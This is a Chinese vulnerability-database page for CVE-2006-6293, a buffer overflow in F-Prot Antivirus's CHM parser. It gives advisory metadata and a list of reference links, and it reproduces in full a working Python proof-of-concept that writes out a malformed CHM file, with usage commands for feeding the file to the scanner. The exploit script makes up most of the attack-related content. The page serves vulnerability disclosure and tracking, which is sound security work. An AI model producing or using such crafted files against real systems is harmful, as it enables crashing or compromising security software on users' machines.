FRISK Software F-Prot Antivirus CHM文件栈缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111719 漏洞类型 缓冲区溢出
发布时间 2006-12-04 更新时间 2006-12-08
CVE编号 CVE-2006-6293 CNNVD-ID CNNVD-200612-075
漏洞平台 Linux CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2893
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-075
|漏洞详情
FRISKSoftwareF-ProtAntivirus存在栈缓冲区溢出,用户协助式远程攻击者可通过特制的CHM文件来执行任意代码。
|漏洞EXP
# fprot2.py - trivial proof of concept code for F-Prot 4.6.6 .CHM heap
# overflow
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# $ ./fprot2.py > 1.chm
# $ f-prot 1.chm

import sys
import struct

s=""
s+="ITSF"        # signature
s+=struct.pack("<L",3) # version
s+=struct.pack("<L",96) # header_len
s+=struct.pack("<L",1) # unknown
s+=struct.pack("<L",0x41424344) # last_modified
s+=struct.pack("<L",0x419) # lang_id
s+="A"*16 #dir_clsid
s+="B"*16 #stream_clsid
s+=struct.pack("<L",96) + "\x00" * 4 #sec0_offset
s+=struct.pack("<L",24) + "\x00" * 4 #sec0_len
s+=struct.pack("<L",120) + "\x00" *4 #dir_offset
s+=struct.pack("<L",4180) + "\x00" * 4 #dir_len
s+=struct.pack("<L",4300) + "\x00"*4 #data_offset
s+="A"*24
s+="ITSP"
s+=struct.pack("<L", 1) # version
s+=struct.pack("<L",0x54) # header_len
s+=struct.pack("<L", 0xa) # unknown
s+=struct.pack("<L",1000) # block_len - BUG?
s+=struct.pack("<L",2) # blockidx
s+=struct.pack("<L", 1) # index_depth
s+=struct.pack("<L", -1) # index_root
s+=struct.pack("<L",0) # index_head
s+=struct.pack("<L",0) # index_tail
s+=struct.pack("<L", -1) # unknown2
s+=struct.pack("<L",1) # num_blocks
s+=struct.pack("<L", 1033) # lang_id
s+="A"*32
s+="B"*10000

sys.stdout.write(s)

# milw0rm.com [2006-12-04]
|参考资料

来源:BID
名称:21086
链接:http://www.securityfocus.com/bid/21086
来源:BUGTRAQ
名称:20061204F-ProtAntivirusforUnix:heapoverflowandDenialofService
链接:http://www.securityfocus.com/archive/1/archive/1/453475/100/0/threaded
来源:OSVDB
名称:30406
链接:http://www.osvdb.org/30406
来源:MILW0RM
名称:2893
链接:http://www.milw0rm.com/exploits/2893
来源:VUPEN
名称:ADV-2006-4830
链接:http://www.frsirt.com/english/advisories/2006/4830
来源:www.f-prot.com
链接:http://www.f-prot.com/news/gen_news/061201_release_unix467.html
来源:SECTRACK
名称:1017331
链接:http://securitytracker.com/id?1017331
来源:SECUNIA
名称:22879
链接:http://secunia.com/advisories/22879
来源:FULLDISC
名称:20061204F-ProtAntivirusforUnix:heapoverflowandDenialofService
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051096.html
来源:MISC
链接:http://gleg.net/vulndisco_meta.shtml
来源:MISC
链接:http://gleg.net/fprot.txt
来源:GENTOO
名称:GLSA-200612-12
链接:http://security.gentoo.org/glsa/glsa-200612-12.xml
来源:SECUNIA
名称:23328
链接:http://secunia.com/advisories/23328
来源:MILW0RM
名称